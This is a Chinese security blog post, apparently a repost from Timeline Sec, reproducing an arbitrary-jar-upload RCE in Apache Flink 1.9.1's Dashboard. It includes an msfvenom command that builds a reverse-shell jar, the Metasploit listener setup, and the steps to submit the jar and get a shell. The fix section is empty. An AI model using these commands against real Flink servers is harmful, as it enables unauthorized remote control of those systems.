前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

作者头像
Timeline Sec
发布2019-12-12 22:09:08
1.9K0
发布2019-12-12 22:09:08
举报
文章被收录于专栏:Timeline Sec

x00 简介


Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01 漏洞概述


攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。

0x02 影响版本


至目前最新版本Apache Flink 1.9.1

0x03 环境搭建


测试环境:Flink 1.9.1 java8+

Apache Flink 1.9.1安装包下载

代码语言:javascript
复制
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

解压后进入bin文件夹,运行./start-cluster.sh

验证Flink启动之后,默认web 端口8081是否正常

访问http://ip:8081/可看到环境页面

0x04 漏洞利用


1、上传msf生成的jar包

生成rce.jar文件

代码语言:javascript
复制
msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8087 -f jar > rce.jar

2、配置msf监听

代码语言:javascript
复制
代码语言:javascript
复制
use exploit/multi/handlerset payload java/shell/reverse_tcpset LHOST 127.0.0.1set LPORT 8087show optionsrun
代码语言:javascript
复制

在Submit New Job处上传rec.jar文件,点击submit

成功反弹shell,执行id可看到结果

0x05 修复方式


本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-11-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • x00 简介
  • Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。
  • 0x01 漏洞概述
  • 攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。
  • 0x02 影响版本
  • 至目前最新版本Apache Flink 1.9.1
  • 0x04 漏洞利用
  • 1、上传msf生成的jar包
相关产品与服务
大数据
全栈大数据产品,面向海量数据场景,帮助您 “智理无数,心中有数”!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档